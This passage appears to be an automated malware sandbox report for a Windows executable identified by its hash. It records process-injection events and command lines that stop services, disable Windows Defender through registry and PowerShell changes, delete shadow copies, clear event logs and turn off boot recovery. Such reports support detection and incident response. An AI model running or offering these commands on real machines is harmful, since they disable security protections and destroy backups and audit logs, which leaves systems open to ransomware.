PID 1308 wrote to memory of 1116 | N/A | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | C:\Windows\system32\net.exe
PID 1116 wrote to memory of 1072 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1116 wrote to memory of 1072 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1116 wrote to memory of 1072 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1308 wrote to memory of 1628 | N/A | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | C:\Windows\system32\net.exe
PID 1308 wrote to memory of 1628 | N/A | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | C:\Windows\system32\net.exe
PID 1308 wrote to memory of 1628 | N/A | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | C:\Windows\system32\net.exe
PID 1628 wrote to memory of 1688 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1628 wrote to memory of 1688 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1628 wrote to memory of 1688 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1308 wrote to memory of 1768 | N/A | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | C:\Windows\system32\net.exe
PID 1308 wrote to memory of 1768 | N/A | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | C:\Windows\system32\net.exe
PID 1308 wrote to memory of 1768 | N/A | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | C:\Windows\system32\net.exe
PID 1768 wrote to memory of 396 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1768 wrote to memory of 396 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1768 wrote to memory of 396 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1308 wrote to memory of 1108 | N/A | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | C:\Windows\system32\net.exe
PID 1308 wrote to memory of 1108 | N/A | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | C:\Windows\system32\net.exe
PID 1308 wrote to memory of 1108 | N/A | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | C:\Windows\system32\net.exe
PID 1108 wrote to memory of 1100 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1108 wrote to memory of 1100 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1108 wrote to memory of 1100 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1308 wrote to memory of 1056 | N/A | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | C:\Windows\system32\net.exe
PID 1308 wrote to memory of 1056 | N/A | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | C:\Windows\system32\net.exe
PID 1308 wrote to memory of 1056 | N/A | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | C:\Windows\system32\net.exe
PID 1056 wrote to memory of 1808 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1056 wrote to memory of 1808 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1056 wrote to memory of 1808 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1308 wrote to memory of 1360 | N/A | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | C:\Windows\system32\net.exe
PID 1308 wrote to memory of 1360 | N/A | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | C:\Windows\system32\net.exe
PID 1308 wrote to memory of 1360 | N/A | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | C:\Windows\system32\net.exe
PID 1360 wrote to memory of 1368 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1360 wrote to memory of 1368 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1360 wrote to memory of 1368 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1308 wrote to memory of 1196 | N/A | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | C:\Windows\system32\net.exe
PID 1308 wrote to memory of 1196 | N/A | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | C:\Windows\system32\net.exe
PID 1308 wrote to memory of 1196 | N/A | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | C:\Windows\system32\net.exe
PID 1196 wrote to memory of 1332 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1196 wrote to memory of 1332 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1196 wrote to memory of 1332 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1308 wrote to memory of 1204 | N/A | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | C:\Windows\system32\sc.exe
PID 1308 wrote to memory of 1204 | N/A | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | C:\Windows\system32\sc.exe
PID 1308 wrote to memory of 1204 | N/A | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | C:\Windows\system32\sc.exe
PID 1308 wrote to memory of 1476 | N/A | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | C:\Windows\system32\sc.exe
PID 1308 wrote to memory of 1476 | N/A | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | C:\Windows\system32\sc.exe
PID 1308 wrote to memory of 1476 | N/A | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | C:\Windows\system32\sc.exe
PID 1308 wrote to memory of 2032 | N/A | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | C:\Windows\system32\sc.exe
PID 1308 wrote to memory of 2032 | N/A | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | C:\Windows\system32\sc.exe
PID 1308 wrote to memory of 2032 | N/A | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | C:\Windows\system32\sc.exe
PID 1308 wrote to memory of 556 | N/A | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | C:\Windows\system32\sc.exe
PID 1308 wrote to memory of 556 | N/A | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | C:\Windows\system32\sc.exe
PID 1308 wrote to memory of 556 | N/A | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | C:\Windows\system32\sc.exe
PID 1308 wrote to memory of 1836 | N/A | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | C:\Windows\system32\sc.exe
PID 1308 wrote to memory of 1836 | N/A | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | C:\Windows\system32\sc.exe
PID 1308 wrote to memory of 1836 | N/A | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | C:\Windows\system32\sc.exe
PID 1308 wrote to memory of 680 | N/A | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | C:\Windows\system32\sc.exe

Processes

C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe

"C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe"

C:\Windows\system32\net.exe

net.exe stop "NetMsmqActivator" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "NetMsmqActivator" /y

C:\Windows\system32\net.exe

net.exe stop "SamSs" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\system32\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\system32\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\system32\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\system32\net.exe

net.exe stop "VSS" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\system32\net.exe

net.exe stop "wbengine" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\system32\net.exe

net.exe stop "WebClient" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\system32\sc.exe

sc.exe config "NetMsmqActivator" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl system

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl security

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl application

C:\Windows\System32\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\System32\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} recoveryenabled no

C:\Windows\system32\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\system32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\system32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

Network

N/A

Files


C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 167090a23e64847bcc9891c90b399071
SHA1 8bf9030451446825ac778dd9f0d42e564a5166ba
SHA256 2f6c04e155715a2efb59427bc2a4941c622fa9d51446b925a59a34cf323bbf48
SHA512 529f1926c5741c272cafb437c7903e24f36fdbb0cc8ae2a0d8bdb93cd3a8be4386559f73ba2d09c18b36f3bd9e29081d782179427b7ea3cd090a6a28404c188a


Analysis: behavioral2

Detonation Overview

Submitted

2022-01-12 16:49

Reported

2022-01-12 16:49

Platform

win10-en-20211208

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A